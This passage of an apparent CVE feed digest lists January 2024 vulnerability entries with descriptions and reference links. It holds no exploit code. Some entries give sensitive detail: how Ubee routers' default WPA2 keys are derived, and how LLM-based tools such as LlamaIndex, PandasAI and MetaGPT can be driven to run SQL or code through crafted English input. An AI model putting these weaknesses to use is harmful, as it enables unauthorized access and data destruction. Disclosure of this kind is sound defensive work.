https://duartecsantos.github.io/2023-01-02-CVE-2023-50447/ | source : cve@mitre.org
https://github.com/python-pillow/Pillow/releases | source : cve@mitre.org


Vulnerability ID : CVE-2023-50693

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 22:52:48

Description :
An issue in dom96 Jester v.0.6.0 and before allows a remote attacker to execute arbitrary code via a crafted request.

CVE ID : CVE-2023-50693
Source : cve@mitre.org
CVSS Score : /

References :
https://gist.github.com/anas-cherni/dd297786750f300a2bab3bb73fee919b | source : cve@mitre.org
https://github.com/dom96/jester/issues/326 | source : cve@mitre.org
https://github.com/dom96/jester/pull/327 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50694

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 22:52:48

Description :
An issue in dom96 HTTPbeast v.0.4.1 and before allows a remote attacker to execute arbitrary code via a crafted request to the parser.nim component.

CVE ID : CVE-2023-50694
Source : cve@mitre.org
CVSS Score : /

References :
https://gist.github.com/anas-cherni/c95e2fc1fd84d93167eb60193318d0b8 | source : cve@mitre.org
https://github.com/dom96/httpbeast/issues/95 | source : cve@mitre.org
https://github.com/dom96/httpbeast/pull/96 | source : cve@mitre.org


Vulnerability ID : CVE-2023-49329

First published on : 19-01-2024 21:15:08
Last modified on : 19-01-2024 22:52:48

Description :
Anomali Match before 4.6.2 allows OS Command Injection. An authenticated admin user can inject and execute operating system commands. This arises from improper handling of untrusted input, enabling an attacker to elevate privileges, execute system commands, and potentially compromise the underlying operating system. The fixed versions are 4.4.5, 4.5.4, and 4.6.2. The earliest affected version is 4.3.

CVE ID : CVE-2023-49329
Source : cve@mitre.org
CVSS Score : /

References :
https://www.anomali.com/collaborate/ciso-blog | source : cve@mitre.org
https://www.anomali.com/security-advisory/anml-2023-01 | source : cve@mitre.org


Vulnerability ID : CVE-2021-31314

First published on : 20-01-2024 01:15:07
Last modified on : 20-01-2024 02:58:09

Description :
File upload vulnerability in ejinshan v8+ terminal security system allows attackers to upload arbitrary files to arbitrary locations on the server.

CVE ID : CVE-2021-31314
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/huahaiYa/jinshansoft/blob/main/Kingsoft%20Security%20Arbitrary%20File%20Upload%20%2B%20File%20Contains%20Vulnerabilities.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-51892

First published on : 20-01-2024 01:15:07
Last modified on : 20-01-2024 02:58:09

Description :
An issue in weaver e-cology v.10.0.2310.01 allows a remote attacker to execute arbitrary code via a crafted script to the FrameworkShellController component.

CVE ID : CVE-2023-51892
Source : cve@mitre.org
CVSS Score : /

References :
http://e-cology.com | source : cve@mitre.org
https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about/51892.txt | source : cve@mitre.org
https://www.weaver.com.cn/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-51926

First published on : 20-01-2024 01:15:07
Last modified on : 20-01-2024 02:58:09

Description :
YonBIP v3_23.05 was discovered to contain an arbitrary file read vulnerability via the nc.bs.framework.comn.serv.CommonServletDispatcher component.

CVE ID : CVE-2023-51926
Source : cve@mitre.org
CVSS Score : /

References :
http://yonbip.com | source : cve@mitre.org
https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about/51926.txt | source : cve@mitre.org
https://www.yonyou.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-51927

First published on : 20-01-2024 01:15:07
Last modified on : 20-01-2024 02:58:09

Description :
YonBIP v3_23.05 was discovered to contain a SQL injection vulnerability via the com.yonyou.hrcloud.attend.web.AttendScriptController.runScript() method.

CVE ID : CVE-2023-51927
Source : cve@mitre.org
CVSS Score : /

References :
http://yonbip.com | source : cve@mitre.org
https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about/51927.txt | source : cve@mitre.org
https://www.yonyou.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-51928

First published on : 20-01-2024 01:15:08
Last modified on : 20-01-2024 02:58:09

Description :
An arbitrary file upload vulnerability in the nccloud.web.arcp.taskmonitor.action.ArcpUploadAction.doAction() method of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file.

CVE ID : CVE-2023-51928
Source : cve@mitre.org
CVSS Score : /

References :
http://yonbip.com | source : cve@mitre.org
https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about/51928.txt | source : cve@mitre.org
https://www.yonyou.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-47024

First published on : 20-01-2024 02:15:07
Last modified on : 20-01-2024 02:58:09

Description :
Cross Site Request Forgery vulnerability in NCR Terminal Handler v.1.5.1 allows a remote attacker to obtain sensitive information and escalate privileges via a crafted script to the UserSelfService component.

CVE ID : CVE-2023-47024
Source : cve@mitre.org
CVSS Score : /

References :
https://docs.google.com/document/d/18EOsFghBsAme0b3Obur8Oc6h5xV9zUCNKyQLw5ERs9Q/edit?usp=sharing | source : cve@mitre.org
https://github.com/Patrick0x41/Security-Advisories/tree/main/CVE-2023-47024 | source : cve@mitre.org


Vulnerability ID : CVE-2023-51906

First published on : 20-01-2024 02:15:07
Last modified on : 20-01-2024 02:58:09

Description :
An issue in yonyou YonBIP v3_23.05 allows a remote attacker to execute arbitrary code via a crafted script to the ServiceDispatcherServlet uap.framework.rc.itf.IResourceManager component.

CVE ID : CVE-2023-51906
Source : cve@mitre.org
CVSS Score : /

References :
http://yonbip.com | source : cve@mitre.org
https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about/51906.txt | source : cve@mitre.org
https://www.yonyou.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-51924

First published on : 20-01-2024 02:15:07
Last modified on : 20-01-2024 02:58:09

Description :
An arbitrary file upload vulnerability in the uap.framework.rc.itf.IResourceManager interface of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file.

CVE ID : CVE-2023-51924
Source : cve@mitre.org
CVSS Score : /

References :
http://yonbip.com | source : cve@mitre.org
https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about/51924.txt | source : cve@mitre.org
https://www.yonyou.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-51925

First published on : 20-01-2024 02:15:07
Last modified on : 20-01-2024 02:58:09

Description :
An arbitrary file upload vulnerability in the nccloud.web.arcp.taskmonitor.action.ArcpUploadAction.doAction() method of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file.

CVE ID : CVE-2023-51925
Source : cve@mitre.org
CVSS Score : /

References :
http://yonbip.com | source : cve@mitre.org
https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about/51925.txt | source : cve@mitre.org
https://www.yonyou.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-46447

First published on : 20-01-2024 05:15:08
Last modified on : 22-01-2024 14:01:14

Description :
The POPS! Rebel application 5.0 for Android, in POPS! Rebel Bluetooth Glucose Monitoring System, sends unencrypted glucose measurements over BLE.

CVE ID : CVE-2023-46447
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/actuator/rebel/blob/main/CWE-319.md | source : cve@mitre.org
https://play.google.com/store/apps/details?id=com.pops.pops | source : cve@mitre.org
https://popsdiabetes.com/about-us/ | source : cve@mitre.org


Vulnerability ID : CVE-2024-23725

First published on : 21-01-2024 04:15:19
Last modified on : 22-01-2024 14:01:14

Description :
Ghost before 5.76.0 allows XSS via a post excerpt in excerpt.js. An XSS payload can be rendered in post summaries.

CVE ID : CVE-2024-23725
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/TryGhost/Ghost/pull/17190 | source : cve@mitre.org
https://github.com/TryGhost/Ghost/releases/tag/v5.76.0 | source : cve@mitre.org


Vulnerability ID : CVE-2024-23726

First published on : 21-01-2024 04:15:19
Last modified on : 22-01-2024 14:01:14

Description :
Ubee DDW365 XCNDDW365 and DDW366 XCNDXW3WB devices have predictable default WPA2 PSKs that could lead to unauthorized remote access. A remote attacker (in proximity to a Wi-Fi network) can derive the default WPA2-PSK value by observing a beacon frame. A PSK is generated by using the first six characters of the SSID and the last six of the BSSID, decrementing the last digit.

CVE ID : CVE-2024-23726
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/actuator/cve/blob/main/Ubee/CWE-1392.md | source : cve@mitre.org


Vulnerability ID : CVE-2024-23730

First published on : 21-01-2024 17:15:44
Last modified on : 22-01-2024 14:01:14

Description :
The OpenAPI and ChatGPT plugin loaders in LlamaHub (aka llama-hub) before 0.0.67 allow attackers to execute arbitrary code because safe_load is not used for YAML.

CVE ID : CVE-2024-23730
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/run-llama/llama-hub/blob/v0.0.67/CHANGELOG.md | source : cve@mitre.org
https://github.com/run-llama/llama-hub/pull/841/commits/9dc9c21a5c6d0226d1d2101c3121d4f085743d52 | source : cve@mitre.org
https://github.com/run-llama/llama-hub/releases/tag/v0.0.67 | source : cve@mitre.org


Vulnerability ID : CVE-2024-23731

First published on : 21-01-2024 17:15:44
Last modified on : 22-01-2024 14:01:14

Description :
The OpenAPI loader in Embedchain before 0.1.57 allows attackers to execute arbitrary code, related to the openapi.py yaml.load function argument.

CVE ID : CVE-2024-23731
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/embedchain/embedchain/compare/0.1.56...0.1.57 | source : cve@mitre.org
https://github.com/embedchain/embedchain/pull/1122 | source : cve@mitre.org


Vulnerability ID : CVE-2024-23732

First published on : 21-01-2024 17:15:44
Last modified on : 22-01-2024 14:01:14

Description :
The JSON loader in Embedchain before 0.1.57 allows a ReDoS (regular expression denial of service) via a long string to json.py.

CVE ID : CVE-2024-23732
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/embedchain/embedchain/compare/0.1.56...0.1.57 | source : cve@mitre.org
https://github.com/embedchain/embedchain/pull/1122 | source : cve@mitre.org


Vulnerability ID : CVE-2023-52353

First published on : 21-01-2024 23:15:44
Last modified on : 22-01-2024 14:01:14

Description :
An issue was discovered in Mbed TLS through 3.5.1. In mbedtls_ssl_session_reset, the maximum negotiable TLS version is mishandled. For example, if the last connection negotiated TLS 1.2, then 1.2 becomes the new maximum.

CVE ID : CVE-2023-52353
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/Mbed-TLS/mbedtls/issues/8654 | source : cve@mitre.org


Vulnerability ID : CVE-2024-23744

First published on : 21-01-2024 23:15:44
Last modified on : 22-01-2024 14:01:09

Description :
An issue was discovered in Mbed TLS 3.5.1. There is persistent handshake denial if a client sends a TLS 1.3 ClientHello without extensions.

CVE ID : CVE-2024-23744
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/Mbed-TLS/mbedtls/issues/8694 | source : cve@mitre.org


Vulnerability ID : CVE-2024-23750

First published on : 22-01-2024 01:15:08
Last modified on : 22-01-2024 14:01:09

Description :
MetaGPT through 0.6.4 allows the QaEngineer role to execute arbitrary code because RunCode.run_script() passes shell metacharacters to subprocess.Popen.

CVE ID : CVE-2024-23750
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/geekan/MetaGPT/issues/731 | source : cve@mitre.org


Vulnerability ID : CVE-2024-23751

First published on : 22-01-2024 01:15:08
Last modified on : 22-01-2024 14:01:09

Description :
LlamaIndex (aka llama_index) through 0.9.34 allows SQL injection via the Text-to-SQL feature in NLSQLTableQueryEngine, SQLTableRetrieverQueryEngine, NLSQLRetriever, RetrieverQueryEngine, and PGVectorSQLQueryEngine. For example, an attacker might be able to delete this year's student records via "Drop the Students table" within English language input.

CVE ID : CVE-2024-23751
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/run-llama/llama_index/issues/9957 | source : cve@mitre.org


Vulnerability ID : CVE-2024-23752

First published on : 22-01-2024 01:15:08
Last modified on : 22-01-2024 14:01:09

Description :
GenerateSDFPipeline in synthetic_dataframe in PandasAI (aka pandas-ai) through 1.5.17 allows attackers to trigger the generation of arbitrary Python code that is executed by SDFCodeExecutor. An attacker can create a dataframe that provides an English language specification of this Python code. NOTE: the vendor previously attempted to restrict code execution in response to a separate issue, CVE-2023-39660.

CVE ID : CVE-2024-23752
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/gventuri/pandas-ai/issues/868 | source : cve@mitre.org


Vulnerability ID : CVE-2024-23770

First published on : 22-01-2024 04:15:07
Last modified on : 22-01-2024 14:01:09

Description :
darkhttpd through 1.15 allows local users to discover credentials (for --auth) by listing processes and their arguments.

CVE ID : CVE-2024-23770
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/emikulic/darkhttpd/commit/2b339828b2a42a5fda105ea84934957a7d23e35d | source : cve@mitre.org
https://github.com/emikulic/darkhttpd/compare/v1.14...v1.15 | source : cve@mitre.org


Vulnerability ID : CVE-2024-23771

First published on : 22-01-2024 04:15:07
Last modified on : 22-01-2024 14:01:09

Description :
darkhttpd before 1.15 uses strcmp (which is not constant time) to verify authentication, which makes it easier for remote attackers to bypass authentication via a timing side channel.

CVE ID : CVE-2024-23771
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/emikulic/darkhttpd/commit/f477619d49f3c4de9ad59bd194265a48ddc03f04 | source : cve@mitre.org
https://github.com/emikulic/darkhttpd/compare/v1.14...v1.15 | source : cve@mitre.org


Vulnerability ID : CVE-2023-47352

First published on : 22-01-2024 05:15:08
Last modified on : 22-01-2024 14:01:09

Description :
Technicolor TC8715D devices have predictable default WPA2 security passwords. An attacker who scans for SSID and BSSID values may be able to predict these passwords.

CVE ID : CVE-2023-47352
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/actuator/Technicolor/blob/main/TC8715D.png | source : cve@mitre.org
https://github.com/actuator/cve/blob/main/Technicolor/CVE-2023-47352 | source : cve@mitre.org
https://i.ebayimg.com/images/g/d4EAAOSwV01kEM26/s-l1600.jpg | source : cve@mitre.org
https://i.ebayimg.com/images/g/zp8AAOSwbNpkEM26/s-l1600.jpg | source : cve@mitre.org


Vulnerability ID : CVE-2017-20189

First published on : 22-01-2024 06:15:07
Last modified on : 22-01-2024 14:01:09

Description :
In Clojure before 1.9.0, classes can be used to construct a serialized object that executes arbitrary code upon deserialization. This is relevant if a server deserializes untrusted objects.

CVE ID : CVE-2017-20189
Source : cve@mitre.org
CVSS Score : /

References :
https://clojure.atlassian.net/browse/CLJ-2204 | source : cve@mitre.org
https://github.com/clojure/clojure/commit/271674c9b484d798484d134a5ac40a6df15d3ac3 | source : cve@mitre.org
https://github.com/frohoff/ysoserial/pull/68/files | source : cve@mitre.org
https://hackmd.io/%40fe1w0/HyefvRQKp | source : cve@mitre.org
https://security.snyk.io/vuln/SNYK-JAVA-ORGCLOJURE-5740378 | source : cve@mitre.org


Vulnerability ID : CVE-2023-52354

First published on : 22-01-2024 06:15:07
Last modified on : 22-01-2024 14:01:09

Description :
chasquid before 1.13 allows SMTP smuggling because LF-terminated lines are accepted.

CVE ID : CVE-2023-52354
Source : cve@mitre.org
CVSS Score : /

References :
https://blitiri.com.ar/p/chasquid/relnotes/#113-2023-12-24 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22895

First published on : 22-01-2024 15:15:09
Last modified on : 22-01-2024 19:10:26

Description :
DedeCMS 5.7.112 has a File Upload vulnerability via uploads/dede/module_upload.php.

CVE ID : CVE-2024-22895
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/zzq66/cve5 | source : cve@mitre.org


Vulnerability ID : CVE-2023-48118

First published on : 22-01-2024 19:15:08
Last modified on : 22-01-2024 20:28:17

Description :
SQL Injection vulnerability in Quest Analytics LLC IQCRM v.2023.9.5 allows a remote attacker to execute arbitrary code via a crafted request to the Common.svc WSDL page.

CVE ID : CVE-2023-48118
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/el-dud3rino/CVE-Disclosures/blob/main/Quest%20Analytics%20IQCRM/Proof%20of%20Concept | source : cve@mitre.org
https://github.com/el-dud3rino/CVE-Disclosures/blob/main/README.md | source : cve@mitre.org
https://www.quest-analytics.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-24135

First published on : 22-01-2024 21:15:08
Last modified on : 22-01-2024 21:15:08

Description :
Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a command injection vulnerability in the function formWriteFacMac. This vulnerability allows attackers to execute arbitrary commands via manipulation of the mac parameter.

CVE ID : CVE-2023-24135
Source : cve@mitre.org
CVSS Score : /

References :
http://eagle.com | source : cve@mitre.org
http://jensen.com | source : cve@mitre.org
https://oxnan.com/img/Pasted%20image%2020230112110814.png | source : cve@mitre.org
https://oxnan.com/posts/WriteFacMac-Command-Injection | source : cve@mitre.org


Source : apache.org

Vulnerability ID : CVE-2024-21733

First published on : 19-01-2024 11:15:08
Last modified on : 19-01-2024 15:56:26

Description :
Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43. Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.

CVE ID : CVE-2024-21733
Source : security@apache.org
CVSS Score : /

References :
http://www.openwall.com/lists/oss-security/2024/01/19/2 | source : security@apache.org
https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz | source : security@apache.org

Vulnerability : CWE-209


Source : wordfence.com

Vulnerability ID : CVE-2024-0663

First published on : 19-01-2024 20:15:13
Last modified on : 19-01-2024 20:15:13

Description :
Rejected reason: REJECT: This is a false positive report.

CVE ID : CVE-2024-0663
Source : security@wordfence.com
CVSS Score : /

References :


Vulnerability ID : CVE-2024-0706

First published on : 22-01-2024 15:15:08
Last modified on : 22-01-2024 15:15:08

Description :
Rejected reason: ***REJECT*** This was a false positive report.

CVE ID : CVE-2024-0706
Source : security@wordfence.com
CVSS Score : /

References :


Source : vulncheck.com

Vulnerability ID : CVE-2024-0758

First published on : 19-01-2024 21:15:09
Last modified on : 19-01-2024 22:52:48

Description :
MolecularFaces before 0.3.0 is vulnerable to cross site scripting. A remote attacker can execute arbitrary JavaScript in the context of a victim browser via crafted molfiles.

CVE ID : CVE-2024-0758
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-2pwh-52h7-7j84 | source : disclosure@vulncheck.com
https://github.com/ipb-halle/MolecularFaces/security/advisories/GHSA-2pwh-52h7-7j84 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-2pwh-52h7-7j84 | source : disclosure@vulncheck.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2024-23679

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Enonic XP versions less than 7.7.4 are vulnerable to a session fixation issue. An remote and unauthenticated attacker can use prior sessions due to the lack of invalidating session attributes.

CVE ID : CVE-2024-23679
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-4m5p-5w5w-3jcf | source : disclosure@vulncheck.com
https://github.com/enonic/xp/commit/0189975691e9e6407a9fee87006f730e84f734ff | source : disclosure@vulncheck.com
https://github.com/enonic/xp/commit/1f44674eb9ab3fbab7103e8d08067846e88bace4 | source : disclosure@vulncheck.com
https://github.com/enonic/xp/commit/2abac31cec8679074debc4f1fb69c25930e40842 | source : disclosure@vulncheck.com
https://github.com/enonic/xp/issues/9253 | source : disclosure@vulncheck.com
https://github.com/enonic/xp/security/advisories/GHSA-4m5p-5w5w-3jcf | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-4m5p-5w5w-3jcf | source : disclosure@vulncheck.com

Vulnerability : CWE-384


Vulnerability ID : CVE-2024-23680

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
AWS Encryption SDK for Java versions 2.0.0 to 2.2.0 and less than 1.9.0 incorrectly validates some invalid ECDSA signatures.

CVE ID : CVE-2024-23680
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-55xh-53m6-936r | source : disclosure@vulncheck.com
https://github.com/aws/aws-encryption-sdk-java/security/advisories/GHSA-55xh-53m6-936r | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-55xh-53m6-936r | source : disclosure@vulncheck.com

Vulnerability : CWE-347


Vulnerability ID : CVE-2024-23681

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Artemis Java Test Sandbox versions before 1.11.2 are vulnerable to a sandbox escape when an attacker loads untrusted libraries using System.load or System.loadLibrary. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.

CVE ID : CVE-2024-23681
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-98hq-4wmw-98w9 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/security/advisories/GHSA-98hq-4wmw-98w9 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-98hq-4wmw-98w9 | source : disclosure@vulncheck.com

Vulnerability : CWE-284


Vulnerability ID : CVE-2024-23682

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Artemis Java Test Sandbox versions before 1.8.0 are vulnerable to a sandbox escape when an attacker includes class files in a package that Ares trusts. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.

CVE ID : CVE-2024-23682
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-227w-wv4j-67h4 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/issues/15 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/releases/tag/1.8.0 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/security/advisories/GHSA-227w-wv4j-67h4 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-227w-wv4j-67h4 | source : disclosure@vulncheck.com

Vulnerability : CWE-501
Vulnerability : CWE-653


Vulnerability ID : CVE-2024-23683

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Artemis Java Test Sandbox versions less than 1.7.6 are vulnerable to a sandbox escape when an attacker crafts a special subclass of InvocationTargetException. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.

CVE ID : CVE-2024-23683
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-883x-6fch-6wjx | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/commit/af4f28a56e2fe600d8750b3b415352a0a3217392 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/issues/15#issuecomment-996449371 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/releases/tag/1.7.6 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/security/advisories/GHSA-883x-6fch-6wjx | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-883x-6fch-6wjx | source : disclosure@vulncheck.com


Vulnerability ID : CVE-2024-23684

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Inefficient algorithmic complexity in DecodeFromBytes function in com.upokecenter.cbor Java implementation of Concise Binary Object Representation (CBOR) versions 4.0.0 to 4.5.1 allows an attacker to cause a denial of service by passing a maliciously crafted input. Depending on an application's use of this library, this may be a remote attacker.

CVE ID : CVE-2024-23684
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-fj2w-wfgv-mwq6 | source : disclosure@vulncheck.com
https://github.com/peteroupc/CBOR-Java/security/advisories/GHSA-fj2w-wfgv-mwq6 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-fj2w-wfgv-mwq6 | source : disclosure@vulncheck.com

Vulnerability : CWE-407


Vulnerability ID : CVE-2024-23685

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Hard-coded credentials in mod-remote-storage versions under 1.7.2 and from 2.0.0 to 2.0.3 allows unauthorized users to gain read access to mod-inventory-storage records including instances, holdings, items, contributor-types, and identifier-types.

CVE ID : CVE-2024-23685
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-m8v7-469p-5x89 | source : disclosure@vulncheck.com
https://github.com/folio-org/mod-remote-storage/commit/57df495f76e9aa5be9ce7ce3a65f89b6dbcbc13b | source : disclosure@vulncheck.com
https://github.com/folio-org/mod-remote-storage/security/advisories/GHSA-m8v7-469p-5x89 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-m8v7-469p-5x89 | source : disclosure@vulncheck.com
https://wiki.folio.org/x/hbMMBw | source : disclosure@vulncheck.com


Vulnerability ID : CVE-2024-23689

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Exposure of sensitive information in exceptions in ClichHouse's clickhouse-r2dbc, com.clickhouse:clickhouse-jdbc, and com.clickhouse:clickhouse-client versions less than 0.4.6 allows unauthorized users to gain access to client certificate passwords via client exception logs. This occurs when 'sslkey' is specified and an exception, such as a ClickHouseException or SQLException, is thrown during database operations; the certificate password is then included in the logged exception message.

CVE ID : CVE-2024-23689
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/ClickHouse/clickhouse-java/issues/1331 | source : disclosure@vulncheck.com
https://github.com/ClickHouse/clickhouse-java/pull/1334 | source : disclosure@vulncheck.com
https://github.com/ClickHouse/clickhouse-java/releases/tag/v0.4.6 | source : disclosure@vulncheck.com
https://github.com/ClickHouse/clickhouse-java/security/advisories/GHSA-g8ph-74m6-8m7r | source : disclosure@vulncheck.com
https://github.com/advisories/GHSA-g8ph-74m6-8m7r | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-g8ph-74m6-8m7r | source : disclosure@vulncheck.com

Vulnerability : CWE-209


Vulnerability ID : CVE-2024-23686

First published on : 19-01-2024 22:15:08
Last modified on : 19-01-2024 22:52:48

Description :
DependencyCheck for Maven 9.0.0 to 9.0.6, for CLI version 9.0.0 to 9.0.5, and for Ant versions 9.0.0 to 9.0.5, when used in debug mode, allows an attacker to recover the NVD API Key from a log file.

CVE ID : CVE-2024-23686
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-qqhq-8r2c-c3f5 | source : disclosure@vulncheck.com
https://github.com/jeremylong/DependencyCheck/security/advisories/GHSA-qqhq-8r2c-c3f5 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-qqhq-8r2c-c3f5 | source : disclosure@vulncheck.com

Vulnerability : CWE-532


Vulnerability ID : CVE-2024-23687

First published on : 19-01-2024 22:15:08
Last modified on : 19-01-2024 22:52:48

Description :
Hard-coded credentials in FOLIO mod-data-export-spring versions before 1.5.4 and from 2.0.0 to 2.0.2 allows unauthenticated users to access critical APIs, modify user data, modify configurations including single-sign-on, and manipulate fees/fines.

CVE ID : CVE-2024-23687
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-vf78-3q9f-92g3 | source : disclosure@vulncheck.com
https://github.com/folio-org/mod-data-export-spring/commit/93aff4566bff59e30f4121b5a2bda5b0b508a446 | source : disclosure@vulncheck.com
https://github.com/folio-org/mod-data-export-spring/security/advisories/GHSA-vf78-3q9f-92g3 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-vf78-3q9f-92g3 | source : disclosure@vulncheck.com
https://wiki.folio.org/x/hbMMBw | source : disclosure@vulncheck.com


Vulnerability ID : CVE-2024-23688

First published on : 19-01-2024 22:15:08
Last modified on : 19-01-2024 22:52:48

Description :
Consensys Discovery versions less than 0.4.5 uses the same AES/GCM nonce for the entire session. which should ideally be unique for every message. The node's private key isn't compromised, only the session key generated for specific peer communication is exposed.

CVE ID : CVE-2024-23688
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/ConsenSys/discovery/security/advisories/GHSA-w3hj-wr2q-x83g | source : disclosure@vulncheck.com
https://github.com/advisories/GHSA-w3hj-wr2q-x83g | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-w3hj-wr2q-x83g | source : disclosure@vulncheck.com

Vulnerability : CWE-323


Source : redhat.com

Vulnerability ID : CVE-2020-36771

First published on : 22-01-2024 14:15:07
Last modified on : 22-01-2024 14:33:50

Description :
CloudLinux CageFS 7.1.1-1 or below passes the authentication token as command line argument. In some configurations this allows local users to view it via the process list and gain code execution as another user.

CVE ID : CVE-2020-36771
Source : secalert@redhat.com
CVSS Score : /

References :
https://blog.cloudlinux.com/cagefs-lve-wrappers-and-bsock-have-been-rolled-out-to-100 | source : secalert@redhat.com

Vulnerability : CWE-214


Vulnerability ID : CVE-2020-36772

First published on : 22-01-2024 15:15:07
Last modified on : 22-01-2024 19:10:26

Description :
CloudLinux CageFS 7.0.8-2 or below insufficiently restricts file paths supplied to the sendmail proxy command. This allows local users to read and write arbitrary files outside the CageFS environment in a limited way.

CVE ID : CVE-2020-36772
Source : secalert@redhat.com
CVSS Score : /

References :
https://blog.cloudlinux.com/lve-manager-lve-stats-lve-utils-and-alt-python27-cllib-have-been-rolled-out-to-100 | source : secalert@redhat.com

Vulnerability : CWE-73


Source : dragos.com

Vulnerability ID : CVE-2022-45791

First published on : 22-01-2024 18:15:19
Last modified on : 22-01-2024 18:15:19

Description :
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.

CVE ID : CVE-2022-45791
Source : ot-cert@dragos.com
CVSS Score : /

References :


Vulnerability ID : CVE-2022-45795

